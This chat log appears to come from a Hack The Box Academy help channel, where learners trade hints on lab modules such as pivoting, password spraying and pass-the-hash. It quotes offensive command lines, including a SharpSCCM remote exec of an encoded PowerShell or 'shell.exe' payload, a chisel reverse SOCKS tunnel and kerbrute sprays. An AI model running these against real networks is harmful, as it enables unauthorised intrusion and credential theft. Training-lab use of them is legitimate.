"Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"

i have the NTLM hash i need and i cant seem to crack it. also trying a mix of port proxy and socks proxy has come up fruitless. have people had to crack this password and i need to keep digging or is there something im missing for trying to pass this hash? i already checked through the double hop problem but it all seems based on having the creds

gray yacht
glacial remnant
#

I'm tried with cme, evil-winrm but my problem is launching those from my attack box to the target. since I don't have a full foothold in and routing everything through one external box

gray yacht
glacial remnant
#

the pivot can reach and I've port proxied around to get to most hosts but for whatever reason port proxying to smb has failed me. sadly also some go to impacket tools don't support non standard ports

gray yacht
quartz lagoon
#

and you should be able to PtH from a windows session if you're on the pivot and you have admin rights (look up the passwords module)

#

i had the same problem with socks proxy not working for a reason i still can't explain, but if you have a meterpreter session you can just use portfwd add .... and access a specific service from your attack host (like smb or winrm)

dusky pebble
#

I'm so very stuck in the Password Attacks Skills Assessment, I'd appreciate some kinda help, been stuck for more than 5 hours and I've just logged in the machine

feral fern
#

Hey guys, I am doing the "using web Proxies with inruder" module and I found the index.html file is the files name under the admin directory but firefox wont let me go to the site even after I disables all the security features and also burp intruder does not give me the html page in its response tab. I have been stuck on this for literally a fucking week. Any help would be really appreciated

cloud urchin
feral fern
#

Yep I did GET /admin/$1$.html

vestal ore
#

I am learning Linux Fundamentals but the vpn server is not showing up. The target machine is shown "Waiting to start"

feral fern
cloud urchin
feral fern
#

I used the suggested wordlist common.txt and also another one, and I specifically loaded index

cloud urchin
feral fern
#

I mean I found the file name. The only problem seems to be the browser flags it as insecure. I also tried ffuf and dirb and they all say index.html is the file. I just need to find out a way to get the page itself

waxen totem
feral fern
#

I don't get the advanced options on http. I only get it on https and even then I need my burp proxy setting on in firefox. and when I click advanced options. it takes me to the burp page and says "error reading SSl" and cURL does not work either. it doesn't return the page

waxen totem
feral fern
#

I tried that too, but http would not even give me "advanced"

waxen totem
feral fern
#

It just give me the "learn more" option

waxen totem
#

02think can you read and follow instructions in #welcome real quick so you can post images here?

#

Just looking at the module now looks like you've got the wrong filename anyway

feral fern
#

is it Errindex.html

#

Damn if I got the wrong filename, then my bad for wasting y'alls time, I'll get back to it

waxen totem
feral fern
#

common.txt and directory-medium

waxen totem
#

Just use the first one

feral fern
#

ok let me run that

waxen totem
#

look for 200 status codes

feral fern
#

Im running it rn

cloud urchin
#

i just tested and that section works fine

#

make sure you're doing everything the module shows you, ie. right payload, skilling the regex, etc

feral fern
#

Ok let me do that too

waxen totem
cloud urchin
unkempt granite
#

I want to start learning cyber secruity im new to the cyber space but not new to programming. What course should I start with in HTB?

compact patrolBOT
waxen totem
cloud urchin
#

@feral fern please take care not to post content from modules above tier 0. just follow what the section says to do and you should get the flag.

unkempt granite
#

ah ty!

waxen totem
#

You may leave your suggestion in /feedback and yes they really do read this it's just that it's a long list

bold sun
#

Can someone please please please help with the Android Fundamentals module? I have been trying for weeks to find the build number for for Pixel 3a that the HTB module wants. Everything I entered is incorrect. I searched everywhere even with AI and all of the answers I get the HTB module says is wrong. I am a huge completionist but am ready to just give up on that module completely. Can someone help????

sand rose
#

Hello guys, for the LLMNR Poisioning from windows section, I've rdp'd into the desktop. When I use "Import-Module .\Inveigh.ps1" or "(Get-Command Invoke-Inveigh).Parameters", I'm getting errors saying the module doesn't exist. Both of these are commands shown in the section. Anyone able to help?

pastel plover
waxen totem
#

Unfortunately there's not a path for binex directly

#

but you can always try pwn challenges on the main lab platform

pastel plover
#

thank you so much!

unkempt granite
#

trying to set up parrot os on virtual box but i just have this shell cli instead

unkempt granite
storm elk
elder hearth
#

Module: Introduction to Windows Evasion Techniques
Section: Process Injection
I cannot get this to run and spawn calc on EVASION even though it works correctly on the DEV box. Can anyone help with this, its been a few days.

cloud urchin
#

Are you building as release x64?

elder hearth
#

yes

boreal vessel
#

need some help here
https://academy.hackthebox.com/module/143/section/1271

I'm using the list of valid users (56 of them) with kerbrute and crackmapexec, however the enumeration stopped before the list completes. (21 users for kerbrute, 41 users for crackmapexec)

┌─[htb-student@ea-attack01]─[~]
└──╼ $wc -l valid_user.txt
56 valid_user.txt

┌─[htb-student@ea-attack01]─[~]
└──╼ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_user.txt Welcome1
025/07/18 02:38:25 > Done! Tested 21 logins (0 successes) in 0.063 seconds

both enabling verbose in kerbrute and crackmapexec shows most users are LOCKED OUT, is that the reason why both tools fall short of running the complete user list?

earnest leaf
#

hello

#

a nudge? I'm doing Introduction to Advanced CSRF & XSS Exploitation

#

I'm doing "CORS Misconfiguration" exercise

#

I am exfiltrating "profile.php" and I get the response, but the response is not "profile.php" but the login form.

#

It's like the victim does not have a cookie

jaunty nimbus
#

What is the path to the htb-student's mail? I suck here

#

I have found the mail

#

folder

#

its saying incorrect

fathom pendant
#

The path doesn't need to exist on the system for it to be in the environment

jaunty nimbus
#

when I cd in the mail I do not see anything

fathom pendant
fierce mantle
#

Hello , i wanna ask about netflix

jaunty nimbus
#

@fathom pendant ngl Im confused

fathom pendant
fathom pendant
fierce mantle
#

Isnt a general chat!!

fathom pendant
jaunty nimbus
#

what is environmental behaviour?

raven oriole
#

hi

wary wren
#

In session security skill assessment

I am trying to access http://minilab.htb.net/submit-solution?url=http://<MYIP>:<PORT> however i get an error something went wrong.

#

nvm it worked after some tries in itself

sterile solstice
mortal arrow
#

Hey Guys,

im trying to log into the given target, but after entering the pw it says permission denied. I am at Linux Fundamentals Module 18 section 79. I checked the spelling auf the pw multiple times. Do I miss something?

digital pendant
#

Out of interest are some module sections written in a way whereby the practical portion is similar but does not follow the exact text?

I am on fence if I should post in erratum for this or if its intentional

File Upload Attacks - Client-Side Validation - Disabling Front-end Validation section.

Section reads:

<input type="file" name="uploadFile" id="uploadFile" onchange="checkFile(this)" accept=".jpg,.jpeg,.png">

but in practical the Form & JS is different:

  <form action="upload.php" method="POST" enctype="multipart/form-data" id="uploadForm" onSubmit="if(validate()){upload()}">
    <input type="file" name="uploadFile" id="uploadFile" onChange="showImage()" accept=".jpg,.jpeg,.png">

so I couldn't do an exact comparison of behaviour, only that it uploads my files as section text requires

waxen totem
#

It's intentional to make you think about it deeper

digital pendant
#

Makes sense and did cross my mind, thanks 🙂

slow ember
#

Hello

acoustic owl
#

Please contact the local police authorities

waxen totem
#

He means contact the police in YOUR country...

#

There's nothing we can do, contact whatever authorities you can

#

We really can't help you, just go to whichever authorities you can and make a report

formal briar
#

Hi guys I'm stuck in the "skills assessment - password attack" section. How can I get a foot hold in the DMZ ? As 22 is the unique port open, I tried to hydra ssh with the username:password they gave In the instructions but it doesn't work. Can you give me some hints ?

formal briar
#

I already used it

wooden seal
slow ember
#

I can't message the Main Chat

dark hedge
echo roost
#

I an working in Intro to C2 with Sliver and I am trying to enumerate all the domain admins with SharpView.exe I keep getting the wrong info like only nested groups or groups and not all the user when using the -Recurse option. Here is my command. What Am I doing wrong. execute-assembly /home/saulgoodman/data/sliver/sliver/SharpView.exe Get-DomainGroupMember -Identity "Domain Admins" -Recurse

haughty fiber
#

i need help with password attacks Writing Custom Wordlists and Rules.

echo roost
#

I need a specific user in the DA group however. I don't know their username.

#

My output -

mild cargo
#

Hi, how do I seek help for target machine timing out? Tried restarting already; times out on RDP and SMB, also tried both from Pwnbox and VPN from my local machine. Tried waiting 2 h already for traffic to get better

past relic
#

I’m also experiencing issues with my academy connection. Constantly times out and needs a couple of minutes before working again. Is there anything I can do to fix this?

bold mauve
#

Hi, below are the instructions from PKI ESC1 module but I am not sure how to go about enabling the portforwarding any resources or guidance will be appreciated. I have had rdp into the kali and then rdp into WS001 so far and its so slow it borders on unusable:

For improved RDP performance, it is recommended to first SSH to the kali host while enabling dynamic port forwarding, followed by an RDP connection to WS001 from your attack host utilizing proxychains.

stone scroll
#

Hi all was wondering in the modules. Do you find some questions confusing or vague?

#

Here is the questions i don't quite understand

#

Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

#

I am guessing they are talking about TCP header flags.

wooden seal
stone scroll
#

yeah which i did with the following command : sudo nmap 10.129.232.100 -p- -sV

rustic sage
#

Hello, I don't know why I can't connect via HTTP. When I enter the IP address of my module in my browser, it loads indefinitely. My VPN is connected, I've tried several connection protocols, restarted my OS, changed browsers, created a new lab, but the issue persists. Does anyone have a solution?

note : ping is working fine, also my nmap is fine

west roost
#

Hi, Any tips on how to make RDP Bruteforce faster but without crashing the bruteforce. The normal hydra, netexec are slow Hydra makes error if not set with -W 1 and -t 4 but that is too slow. Other than that any tips the total combination to test is 12k.

wooden seal
rustic sage
#

Learn the basics
of Penetration Testi : Crocodile

stone scroll
sinful portal
#

hi

candid portal
#

Quick hack?

stone ridge
#

Is the website down? I can’t access it.

terse bloom
#

The Live Engagement bug? [-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass when I try to exploit using the 50064.rb. I cannot proceed because the payload provided isn't working?

regal flare
fathom pendant
terse bloom
fathom pendant
#

Make sure to set all variables properly then, iirc vhost may be required in this instance.

wooden seal
stone scroll
#

thanks for the hint

tawdry zealot
#

"Network Services" < module >

What’s wrong with this? I’ve been trying to solve the last two tasks related to SMB and RDP for several hours using the following commands. It runs, but I’m not finding anything relevant. I’m connected via VPN on my VM, which is working just fine.

crackmapexec rdp 10.129.90.148 -u username.list -p password.list

For SMB, I’m working with msfconsole, and so far I’ve found 4 valid users — but the scan is still in progress, and it’s taking hours.

As for RDP, I have no idea what else to try.

echo roost
#

I am having issues with rdp to target machines also

fathom pendant
tawdry zealot
#

Right.

It should take hours, HYDRA too?

fathom pendant
#

Hydra is just a bit cleaner, also netexec should be used in place of crackmapexec

tawdry zealot
#

I will try, thanks for now

latent thistle
#

You guys, i don’t have much money at the moment and im wondering if i buy the premium monthly subscription and I get these 100 cubes, will I be able to finish the whole pentester path with it without doing other things on the htb?

cloud urchin
#

You would need a subscription to unlock more modules. It's a lot cheaper if you have are a student and have an .edu email they recognize. Otherwise it'll cost a lot more cubes to unlock the full path.

glacial juniper
#

Hey there. I'm at the privilege escalation module. I got access to user1, switched to user2 and located the flag.txt but I have to login as root to access it. I also located the .ssh directory which I have read access to only, so I can't insert my own keys. I tried copying the id_rsa into a file, I gave it chmod 600 and it says this error when I try ssh connection to root: Permission denied (publickey)
What am I doing wrong?

tranquil narwhal
#

Is it worth making a windows VM to install all the tools on, if my base OS is windows or shoudl I just install it on this?

#

on the host os*

fathom pendant
glacial juniper
#

ssh root@ip -i id_rsa
this is what i use

#

i use key instead of id_rsa though cuz thats its name on my computer

unkempt granite
#

when can i start learning ctf as a beginner in cybersec? after doing introduction to networking?

fathom pendant
fathom pendant
glacial juniper
#

yes, i created a document file and pasted it there

#

is that ok?

fathom pendant
#

If its an ip:port, you still need to specify port

glacial juniper
#

when i specified port it asked for password

#

that means the ssh is working but i need the pw?

#

Load key "id_rsa" error in libcrypto
Permission denied (publickey)

When i specify the port it only gives me the libcrypto error

glacial juniper
#

fixed it somehow might have copied soemthing wrong, i got the flag

robust tapir
#

Hi, where do I go to to get support for the VPN for the module. It keeps getting disconnected and is extremely slow!

bold mauve
#

Hi, below are the instructions from PKI ESC1 module but I am not sure how to go about enabling the portforwarding any resources or guidance will be appreciated. I have had rdp into the kali and then rdp into WS001 so far and its so slow it borders on unusable:

For improved RDP performance, it is recommended to first SSH to the kali host while enabling dynamic port forwarding, followed by an RDP connection to WS001 from your attack host utilizing proxychains.

fiery oriole
#

.

indigo roost
#

Theoretically you could also use proxychains and SOCKS tunneling to rdp if you wanna practice pivoting too lol

indigo roost
bold mauve
tranquil narwhal
#

Hi there just wondering if I should create a VM for setting up on windows or just use my base OS since that is windows/

#

?*

rustic sage
#
 Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. 

Need help

#

Active directory living off the land

wet arrow
#

Hello, I am using Metasploit's autoroute to pivot and scan a target network, but db_nmap feels slow (likely due proxy) Any faster built-in Metasploit alternatives (besides directly uploading and use Nmap at the pivot)?

solar grove
#

How many people did CAPE CWEE get?

fathom pendant
rough comet
#

ouch

#

my bad, so sorry

north arch
#

Any phishing websites available?

cloud urchin
north arch
#

Just asking.

cloud urchin
#

please read the #rules. this is not the appropriate channel for such discussions, this channel is dedicated for module talk.

#

@north arch Again, read the #rules. DMing without permission is against the rules.

north arch
#

Sorry about that.

#

Am new here

cloud urchin
#

Read the #rules and follow the instructions in #welcome to gain access to other channels.

hollow kernel
#

Hi i have an issue in information gathering web edition

#

I try to do a nikto in the target but i have nothing

#

In fingerprinting part

rustic sage
candid vine
#

Guys im really stuck in this question "Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words)." - WordPress - Discovery & Enumeration
https://academy.hackthebox.com/module/113/section/1100

Any one can help me please? i have been tried every techniques as possible (such as fuzzing plugins paramter and debbuging the webpages).

cloud urchin
#

Maybe try restarting the environment or switching regions/servers

sharp siren
#

Hi, anyone can help me with introduction to deserialization attacks skill assessment 2?

#

I'm stuck the serialization data has a HMAC signature so I don't know how to tamper the data to privesc

fathom pendant
#

Run as...

fathom pendant
#

And you have the password

rustic sage
#

how do i get more cubes without buying it

#

so i have to buy them

fathom pendant
rustic sage
#

doesnt let me

rustic sage
#

where do i get into that

fathom pendant
rustic sage
#

sorry if im bothering just curious

fathom pendant
#

A bit of a catch 22

#

Gotta know stuff to get stuff

rustic sage
#

so the app and academy are 2 diff things

fathom pendant
#

Same company, different platforms

rustic sage
#

could you hack my discord acc hypothetically speaking

#

from what hackthebox teachs ethically if i gave you the permisson

#

not that i want to but still

fleet spindle
#

Hello,
Can any one guide me how to move on after knowing all the basics of network and pentesting ,like continue with htb or join a community so I can learn more practical things because i feel little stuck

compact patrolBOT
fleet spindle
rustic sage
#

did you do the all modules

fleet spindle
#

No
I am continually doing them

rustic sage
#

hackthebox gives till advanced with paid versions

#

cracking wifi codes, or invading the https sites with a terminal but those i think are beginners or intermidate

#

you can get more pratical here

fleet spindle
#

So I focus on htb will make me more familiar to everything as in real world ?

cloud urchin
rustic sage
#

i dont have the permisson to speak

rustic sage
cloud urchin
rustic sage
#

oops i didnt read that mb ill do that

candid vine
gentle lodge
#

Hi, how are you? I'm thinking of purchasing a VIP membership for The Hack Box, but I have some questions about the service.

#

????

cloud urchin
gentle lodge
cloud urchin
upbeat dust
#

Quesiton 2
I rly need help

wooden seal
quartz verge
#

[] 94.237.61.242:59902 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 94.237.61.242:59902 - An SMB Login Error occurred while connecting to the IPC$ tree.
[
] 94.237.61.242:59902 - Scanned 1 of 1 hosts (100% complete)
[*] 94.237.61.242:59902 - Cannot reliably check exploitability.

when i tried to run as what was instructed it shows this in the check

cloud urchin
quartz verge
#

let me try that

quartz verge
cloud urchin
quartz verge
quasi wave
#

Are red team or blue team modules prerequisite to purple team ones?

#

Or no?

#

I’m curious since they started adding purple modules

#

And if so will purple team modules be harder?

#

Or are they meant to build upon either red or blue team skills or both?

#

Or neither and what does a purple teamer actually do

cloud urchin
#

the module's overview page shows any recommended prereq's

radiant crescent
#

hello
i was trying to solve this question - What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
and ran this command -- find . -type f -name "*.conf" -newermt 2020-03-03 -size +25k -size -28k -ls 2>/dev/null
i recieve no output
am i doing something wrong

tame turtle
#

Hi guys! i am having issues with some socks on Windows lateral movement.
Long story short is as follows, Im going to pivot from the dualhomes SRV01.
On kali i run chisel server --reverse --socks5 on SRV01 i run .\chisel.exe client <IP>:8080 R:socks. I get the expected output server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening and i get the connection.

Now!
proxychains xfreerdp works as expected on an internal machine.
proxychains evil-winrm works as expected on an internal machine.
nmap -sT does NOT work.
impacket-dcomexec does NOT work.

I cant understand why some tools work, and others do not?

add, my proxychains.conf is socks5 127.0.0.1 1080

autumn pilot
#

Try running them with sudo

tame turtle
tame turtle
leaden island
#

sry for the hidden mouse its a wayland thing issue

#

also right click menu acts the same

acoustic tapir
#

Hey, is there a place here to find a team or teammates for CTFs?

acoustic owl
devout lily
#

Hi everyone, what is the meaning of "ritired machine"?

#

Can i play it or not?

#

Im new on htb, 0 rank

waxen totem
#

Hi, please read and follow instructions in #welcome

A Retired Machine is a machine that was active and has been retired or has been released as retired, you can still play retired machines, some are free, some require VIP or VIP+ to play. Since they are retired public writeups are allowed but they do not contribute to your ranks or provide points

devout lily
waxen totem
devout lily
wooden seal
#

i reffered my friend but i didnt got the cubes but they did got it (yes they did completed intro to academy module)

leaden island
#

Looks like its not a popular issue

waxen totem
#

Well most people using tmux don't tend to use the mouse 😅

#

We usually go into selection mode and use vim keybindings

leaden island
#

Here comes tbe second issue

#

Keybindings like copy also dont work

#

I can select text, but cant copy even if i set a new key bind for copy

waxen totem
#

Well it only copies for tmux, you'd have to set a keybind for an xclip command iirc

#

it's like a vim copy (yank, y) and paste (p)

leaden island
#

So tmux has its own clipboard ?

waxen totem
#

In a sense yes

leaden island
#

Ahaa i get it now

leaden island
#

This gonna work thanks G

blazing timber
#

In the shells and payload live engagement section.
I was doing host 3 after completing host 1 and 2.
But I think I crashed the server after repeated exploitation attempts with different ms17 versions - it timed out and didn't give any response after a while.

I restarted the lab environment.
But now host 3 is unreachable when I ping it. Host 1 and 2 are completely fine. Previously host 3 gave ping response and now it doesn't.

Is this issue on my end or the lab environment?

limpid siren
sturdy lantern
#

Hi, I'm struggling to find this path right here. I tried multiple times myself with cd commands but I still can't find it. Am I missing something?

waxen totem
sturdy lantern
acoustic owl
#

Where are system-relevant things configured and stored? Have a look there

acoustic owl
sturdy lantern
#

But that directory doesn't exist tho

#

I did echo $MAIL

#

To find it

waxen totem
#

also deleted your message cos it contained the answer dogekek

sturdy lantern
limpid siren
hybrid wren
#

Hi! did you manage to find the expected configuration for this question?

vapid phoenix
#

Hello can someone help me with this question??

Q: Submit the NT hash associated with the Administrator user from the example output in the section reading.

This is from Password Attacks, Attacking Active Directory and NTDS.dit

The problem is that I can't seem to figure out the username, from the list I have created by going onto the website and finding the email address. What am I doing wrong, tell me if you need more information.

hybrid wren
#

Strange! Thanks 🙂 . Did you also find the lab to be very laggy?

outer thorn
#

Hi

raw apex
#

Yo

stone grotto
#

hey to start learning, I need to start from tier 0, right?

sonic nacelle
#

Where is the hack the system(a past ctf) channel containg the writeups in it?
Does htb delete past ctf channels!!!

acoustic owl
mellow iris
#

Hi everyone, I'm having a bit of trouble with the "Pass the Certificate" part of the "Password Attacks" module. For the 2nd question, when you need to use ntlmrelayx and printerbug to obtain a cert from the DC01 machine, I've tried from my machine, and from the pwnbox, I get the same error each time, I went and looked for the solution, I'm apparently doing everything right, so I don't really know what to do, if anyone may help, thanks

thin nexus
#

Can anyone give me a clue on Artificial machine htb, I have no clue on how to get into it, no ports are vulnerable and the site itself isn't vuln to stuff like sql and xss,, any clues?

green rock
#

I got hacked

#

Dm if you can

acoustic owl
thin nexus
#

Yeah buddy it says no access

green rock
#

I did

green rock
gray yacht
upbeat dust
#

then am j lost idk wt to do or wt the answer

mellow iris
upbeat dust
gray yacht
mellow iris
gray yacht
#

It should look like the hint displays.

gray yacht
#

Read back through the paragraphs under Tmux.conf

humble breach
#

Been stuck on this question for hours, followed the exact steps and none of the answers are correct. If anyone knows the solution let me know!
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X

spring root
#

doing the file upload attack module. the questions is:
The above exercise employs a blacklist and a whitelist test to block unwanted extensions and only allow image extensions. Try to bypass both to upload a PHP script and execute code to read "/flag.txt" i bypassed the upload filter but when i navigate to the url i can't acces the web shell

gray yacht
spring root
gray yacht
spring root
#

yeah ty i named the file shell.phar%20.jpg insted of shell.phar .jpg. that fixed the problem

tired flax
#

Someone out there has done Common Session Variables (Account Takeover)?
Supposedly I have already changed the password of the Admin but I alwaysget "Invalid Information".
Can someone help me out?

forest fulcrum
#

if anyone is working on the SCCM module (last module in CAPE) - I could use a sanity check, I am using LAB\rai account to get command execution on domain machines using SharpSCCM.exe
I tried different variants like:
SharpSCCM.exe exec -d SRV01.lab.local -rid 16777247 --no-banner -sms 172.50.0.40 -p "powershell -exec bypass -enc ZwBjAGkAIAB...SNIP..."
SharpSCCM.exe exec -d SRV01.lab.local -rid 16777247 --no-banner -sms 172.50.0.40 -p "c:\windows\system32\cmd.exe /c c:\temp\shell.exe"
all commands complete successfully with no errors, but nothing happens.

#

any extra set of eyes would be appreciated.

river grove
#

Need some help with final assessment for advanced sql injections. My decompiled java is not correct so I cant do the exploit

stark glen
#

i need help with a flag capture exercise, could someone help me? i am new and learning at htb academy.

rustic sage
#

ctfs

#

you can learn from picoctfs

stark glen
#

what would be the best place to really learn hacking for free

fast arrow
#

Hi, I'm doing the "Intermediate Network Traffic Analysis" module

It seems like the patterns for detecting "Finding Irregularities in Fragment Offsets" and "Finding Decoy Scanning Attempts" are exactly the same. Is there a way to tell these apart or are they supposed to look identical in the captures?

The pattern is to look for IPv4 fragmentation followed by TCP RST - both sections tell us to look for this and the captures are pretty much the same.

muted crescent
#

Hey guys, I'm looking forward to signing up for an annual subscription. Does anyone have a discount code?

fathom pendant
rancid fjord
#

Hey guys, I am following the "Attacking WPA/WPA2 Wi-Fi Networks" module, and I am stuck on the PEAP Relay. I tried that machine couple of times, even with updated tools (hostapd, sychophant directly from Sensepost's GitHub) but I always get "SYCOPHANT: Unable to open state file /tmp/SYCOPHANT_STATE, not relaying". At the end I "cheated" using EAP downgrade to get the answer, but still I can't understand what the problem is...

hexed oyster
#

Struggling with "Web Service & API Attacks -> final assessment" I'm not really sure how to interact with this service. My first thought was curl but that's proving to be a bit more difficult than anticipated. I think i'm not understanding how SOAP requests are made... does anyone have a good resource to read up on how to do that?

#

Or if I'm wandering completely down the wrong rabbit hole, can you at least give me a nudge in the right direction?

stiff bone
#

Hi, who can I contact for help in dm on the Active Directory Trust Attacks - Skills Assessment module on question 2. I tried different vectors and I ran out of options. In private messages I will show what I have already done

unborn nebula
#

hello ,
could i refund sub ? i got silver annual just one day from purchase

fathom pendant
#

reach out to support, you'll have to wait until Monday since Billing is Mon-Fri

unborn nebula
fathom pendant
#

via website

compact patrolBOT
unborn nebula
fathom pendant
#

yeah, billing is gonna be Monday, they're the only ones that can help you

hollow jasper
#

hey! goodmorning! how do i get access to type in the server? i.e. #general and joining the giveaways

still tusk
#

hello, buying silver monthly subscription is the same as student one? i will have access to all tier 2 courses?

cloud urchin
#

You can see here, the silver plan gives access to all modules up to and including tier 2

#

Yearly Plans
Silver Annual 🧑‍💼

Price: $490/year (USD)

Access Based

Direct access to all modules up to (including) Tier II

Direct access to the entire Bug Bounty Hunter job role path

Direct access to the entire Penetration Tester job role path

Direct access to the entire SOC Analyst  job role path

Step-by-step Module Solutions

Unlimited Pwnbox usage

CPE credits submission
#

that's for the yearly

#

the monthly doesn't give full access like that

#

Monthly Plans
Silver 👨‍💼

Get Started with Cybersecurity.

Price: $18/month (USD)

Cubes Based

200 cubes each month to unlock modules. (11% discount)

Unlimited Pwnbox usage

CPE credits submission
#

the silver yearly also gives one exam voucher per year

still tusk
fathom pendant
#

you'd have to reach out to support

still tusk
fathom pendant
#

but be aware: billing (they handle subs) is only avail mon-fri

upbeat dust
honest blaze
#

Evening all, I may be approaching this incorrectly but on:
https://academy.hackthebox.com/module/35/section/227

The provided IP isn't responding to my cURLS, and when I checked in the dev tools I'm seeing
<p>The requested URL was not found on this server.</p>

I've refreshed it a few times but it's still giving me the same. Is this task down, or am I just doing it wrong?

Thanks 🙂

edit - I furiously refreshed it and it worked 🙂

heady sapphire
#

Hello I am struggling in module Attacking Active Directory and NTDS.dit. I have created a wordlists and performed brute force attack with netexec and found credentials for cjoshnson but when I use the -M ntdsutil it doesn’t capture the ntds file

wild folio
#

I'm so lost on windows lateral movement module skill assessment. I have access to WSUS as rossy but I can't run SharpWSUS.exe because I don't have an administrators powershell prompt. What am I missing?

rustic sage
#

Hello

rustic sage
#

@fathom pendant

fallen wigeon
#

I am doing Linux fundamental module and in one section where we learn about the file search there is one question for one cube which I can't solve

and the question is this- What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?

to solve this I am runnin this command - find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k

but it is showing permission denied which is obvious but I dont know the password of root if I am running this command with sudo and after give the pass its saying I am not in the sudoers list

so can anyboy help me find that file and tell how can I find it

fathom pendant
rustic sage
fathom pendant
rancid fjord
heady sapphire
#

Hello I am struggling in module Attacking Active Directory and NTDS.dit. I have created a wordlists and performed brute force attack with netexec and found credentials for cjoshnson but when I use the -M ntdsutil it doesn’t capture the ntds file

wild folio
tired atlas
#

LLMNR/NBT-NS Poisoning - from Windows (Active Directory)

I'm on this, and when I run the Inveigh command, I capture no hashes, I've tried, resetting the box, and the IP, just not happening

tired atlas
#

nvm

#

fixed it

silk hazel
#

Are there any plans for a VIP tier on academy?

winter bay
#

I am sooo lost with Credential Hunting in Network Shares. I have used nxc but i didnt get anything. Any help would be great.

silk hazel
cloud urchin
#

I don't know HTB's plans at all. They aren't shared environments though, except maybe the underling machine running the module contents.

silk hazel
#

Okay, well ... to shout into the void: I and many others would probably love to pay more for convenience.

stiff bone
#

Who can I contact for help AD Trust Attacks skills assessment?

dapper moth
stiff bone
dapper moth
#

Shoot it then

stiff bone
dapper moth
#

sure

cloud urchin
robust pecan
#

Good afternoon. I hope you are having a great, chill weekend. I need help, please.

Module: Command Injections
Section: Bypassing Other Blacklisted Characters
Objective: What is the user in /home?
Problem: I am not able to see the users.

I am able to use ${PATH:0:1} to see the root of the tree.
I am able to use ${PATH:0:5} but it does not return what I expect. On PWNBox it returns the users, but on the exercise it returns something else.

Any guidance and help is greatly appreciated.

silk hazel
#

Take the feedback or file it away in the round filing cabinet, up to you!

gray yacht
cloud urchin
silk hazel
cloud urchin
#

Like I said, the Academy boxes are already personal

silk hazel
#

Okay. In that case, I think my feedback is more constructive as:

I would like to pay more for a priority VPN server ... or better hardware ... or better something. Whatever offers a better user experience when connecting to HTB machines. I do see value in maybe 1 module which is about dealing with machines which are themselves resource constrained or over a slow network. But for the rest, I would be willing to pay nearly double for silver (for example) if it can just be faster and I can focus better on the module's content.

/feedback

winter bay
cloud urchin
silk hazel
#

oh fuck me! I thought when that was used previously it was a search term. I'll retry that via the command.

fathom pendant
silk hazel
#

done. sorry I misunderstood what you said before

fathom pendant
#

ye no problem

#

as a short note the feedback command goes directly to the HTB slack, so staff definitely see it

viscid tartan
#

Can i ask about a specific sherlock here?

cloud urchin
glacial juniper
#

Hey there. I'm doing the Knowledge check section now where I have to use a GetSimple CMS exploit. When I try to run the exploit, it says failed authentication error. The RHOST, LHOST, username, password is set correctly because I have logged in before. The targeturi is set to /admin. I'm stuck at this issue and don't know what else to try. I chose the metasploit because the file upload on the site weren't working.

fathom pendant
glacial juniper
#

i didnt change it first but got the same issue

#

i thought that was the issue so i changed it but got the same issue

fathom pendant
#

I dont think I needed to change too much; this is the knowledge check from the Getting Started Module yeah?

glacial juniper
#

yes

glacial juniper
#

username, pw

fathom pendant
#

Ye gimme a sec to check my notes

#

My notes have the manual way not the msf way

glacial juniper
#

i read about a manual way but tbh idk how they do it

#

uploading the file to gain reverse shell access

zenith pagoda
#

Hi everyone

#

Need help with SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe)

#

The question says to enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X

fathom pendant
fathom pendant
#

So you'll need to find a way to sort by individual dates

zenith pagoda
fathom pendant
fathom pendant
zenith pagoda
zenith pagoda
fathom pendant
#

@golden saddle your screenshot contained an answer to another question

golden saddle
#

sorry mb didnt pay attention im lost with the question lol

candid vine
golden saddle
#

searched in every share:

fathom pendant
strange pivot
#

In advanced deserialisation Example 2: XML, Am I editing the clientside type value that sends the post request at /import or Am I adding a the string value to the top of my payload like shown in the DNN example:

<key="pentest-tools.com" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">

Any help would be much appreciated

golden saddle
candid vine
golden saddle
fathom pendant
#

For q1

#

If youre redoing this module, then the answer may be diff

golden saddle
#

ohh i need to reset the target it stopped thats why its not showing results

fathom pendant
sand rose
#

i'm doing kerbrute bruteforcing on the active directory module section "password spraying-making a target user list". I keep getting an error that says "Requested starttime is later than endtime". What does that mean? I don't see anything in the section addressing it unless I overlooked it.

exotic bay
#

how

cloud urchin
#

reach out to their support

#

this has nothing to do with HTB or the modules, please take care to stay on topic here

exotic bay
#

ok

#

why i can't send message to general?

cloud urchin
#

You need to follow the instructions in #welcome to gain access to most channels

half inlet
fathom pendant
#

you don't have to install it; proxmox is basically a server hypervisor

half inlet
#

i see, would it be preferable to use that instead of physical machines for a home lab?

fathom pendant
#

Not always, proxmox works best if you have the RAM and CPU to support it

half inlet
#

I see, thank you!

lavish spear
#

is it recommended that i do the learning process or getting started module first? i did the intro to academy alr

waxen totem
lavish spear
#

ah

#

thanks

strong sorrel
#

i need help in NFS

i way trying to find how NFS works and now stuck in a problem

brave scroll
#

are u saving the cookie before refreshing?

#

is the cookie saved after refreshing the page?

#

send the link of specific module, so i can figure out where you are stucked

#

on which question u are?

strong sorrel
#

hey

#

why am not able to send a large message ?

brave scroll
strong sorrel
#

i am trying to explain my problem

#

i cant even send a screenshot

brave scroll
#

